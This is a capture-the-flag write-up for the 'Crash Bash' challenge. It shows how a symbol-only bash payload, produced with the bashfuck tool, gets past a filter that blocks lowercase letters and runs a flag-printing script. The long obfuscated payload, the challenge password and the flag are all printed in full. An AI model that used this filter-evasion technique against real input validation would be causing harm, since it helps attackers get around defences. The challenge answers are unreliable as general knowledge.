Recently Updated
Crash Bash
Challenge
Can you crash the bash?
The password is B4sh_br0TH3rs
Connect using nc ch.hackyeaster.com 2303
Note: The service is restarted every hour at x:00.
Hint: Some characters are forbidden, in the whole string you enter.`
Solution
We connect and quickly find out we cannot use any lowercase letters in our commands:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nc ch.hackyeaster.com 2303
Welcome to Crash Bash!
To get the flag, call /printflag.sh with the password!
Enter "q" to quit.
----------------------
crashbash$ a
Invalid input, bash crashed!
crashbash$ b
Invalid input, bash crashed!
crashbash$ 1
/bin/bash: line 1: 1: command not found
crashbash$ 2
/bin/bash: line 1: 2: command not found
crashbash$ _
/bin/bash: line 1: _: command not found
crashbash$ A
/bin/bash: line 1: A: command not found
crashbash$
so we have to find a way to call /printflag.sh B4sh_br0TH3rs without using any lowercase letters, hmm..
Luckily we find an AMAZING program called bashfuck which will do just that for us, convert any command to a version that doesn’t use any alphnumeric characters!
So we download it (copy here), and ask it to construct our command for us:
1
2
3
4
5
6
7
8
9
10
11
12
$ ./bashfuck.sh /printflag.sh B4sh_br0TH3rs
cmd: `/printflag.sh B4sh_br0TH3rs`
result (1960 byte): ${!#}<<<{$\'\\${##}$((${##}<<$((${##}<<${##}))))$((${##}<<${##}))\\${##}$((${##}<<$((${##}<<${##}))))${##}\\${##}$(($((${##}<<${##}))#${##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\\${##}$(($((${##}<<${
##}))#${##}$#${##}))$#\',$\'\\$#$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}$#${##}))\\${##}$((${##}<<$((${##}<<${##}))))$(($((${##}<<${##}))#${##}${##}))\',
$\'\\$#$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}${##}${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$#\\${##}$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<${##}))\\${##}$(($((${##
}<<${##}))#${##}$#${##}))${##}\\${##}$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}${##}$#))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<$((${##}<<${##}))))\\${##}$((${##}<<$((${
##}<<${##}))))$(($((${##}<<${##}))#${##}${##}$#))\\${##}$(($((${##}<<${##}))#${##}$#${##}))$((${##}<<$((${##}<<${##}))))\\${##}$((${##}<<$((${##}<<${##}))))${##}\\${##}$((${##}<<$((${##}<<${##}))))$((
$((${##}<<${##}))#${##}${##}${##}))\\$#$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}${##}$#))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\\${##}$(($((${#
#}<<${##}))#${##}$#${##}))$#\\$#$((${##}<<$((${##}<<${##}))))$#\\${##}$#$((${##}<<${##}))\\$#$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<$((${##}<<${##}))))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$
(($((${##}<<${##}))#${##}${##}))\\${##}$(($((${##}<<${##}))#${##}$#${##}))$#\\${##}$(($((${##}<<${##}))#${##}${##}))$(($((${##}<<${##}))#${##}${##}${##}))\\${##}$((${##}<<$((${##}<<${##}))))$((${##}<<
${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<${##}))\\$#$(($((${##}<<${##}))#${##}${##}$#))$#\\${##}$((${##}<<${##}))$((${##}<<$((${##}<<${##}))))\\${##}${##}$#\\$#$(($((${##}<<${##}))#$
{##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\'}
And now we just connect to the service and enter our command:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nc ch.hackyeaster.com 2303
Welcome to Crash Bash!
To get the flag, call /printflag.sh with the password!
Enter "q" to quit.
----------------------
crashbash$ ${!#}<<<{$\'\\${##}$((${##}<<$((${##}<<${##}))))$((${##}<<${##}))\\${##}$((${##}<<$((${##}<<${##}))))${##}\\${##}$(($((${##}<<${##}))#${##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\\${##}$(($((${##}<<${
##}))#${##}$#${##}))$#\',$\'\\$#$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}$#${##}))\\${##}$((${##}<<$((${##}<<${##}))))$(($((${##}<<${##}))#${##}${##}))\',
$\'\\$#$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}${##}${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$#\\${##}$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<${##}))\\${##}$(($((${##
}<<${##}))#${##}$#${##}))${##}\\${##}$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}${##}$#))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<$((${##}<<${##}))))\\${##}$((${##}<<$((${
##}<<${##}))))$(($((${##}<<${##}))#${##}${##}$#))\\${##}$(($((${##}<<${##}))#${##}$#${##}))$((${##}<<$((${##}<<${##}))))\\${##}$((${##}<<$((${##}<<${##}))))${##}\\${##}$((${##}<<$((${##}<<${##}))))$((
$((${##}<<${##}))#${##}${##}${##}))\\$#$(($((${##}<<${##}))#${##}$#${##}))$(($((${##}<<${##}))#${##}${##}$#))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\\${##}$(($((${#
#}<<${##}))#${##}$#${##}))$#\\$#$((${##}<<$((${##}<<${##}))))$#\\${##}$#$((${##}<<${##}))\\$#$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<$((${##}<<${##}))))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$
(($((${##}<<${##}))#${##}${##}))\\${##}$(($((${##}<<${##}))#${##}$#${##}))$#\\${##}$(($((${##}<<${##}))#${##}${##}))$(($((${##}<<${##}))#${##}${##}${##}))\\${##}$((${##}<<$((${##}<<${##}))))$((${##}<<
${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<${##}))\\$#$(($((${##}<<${##}))#${##}${##}$#))$#\\${##}$((${##}<<${##}))$((${##}<<$((${##}<<${##}))))\\${##}${##}$#\\$#$(($((${##}<<${##}))#$
{##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$((${##}<<${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\'}
Congrats, here's your flag:
he2023{gr34t_b4sh_succ3ss!}
crashbash$
succes!
Flag
he2023{gr34t_b4sh_succ3ss!}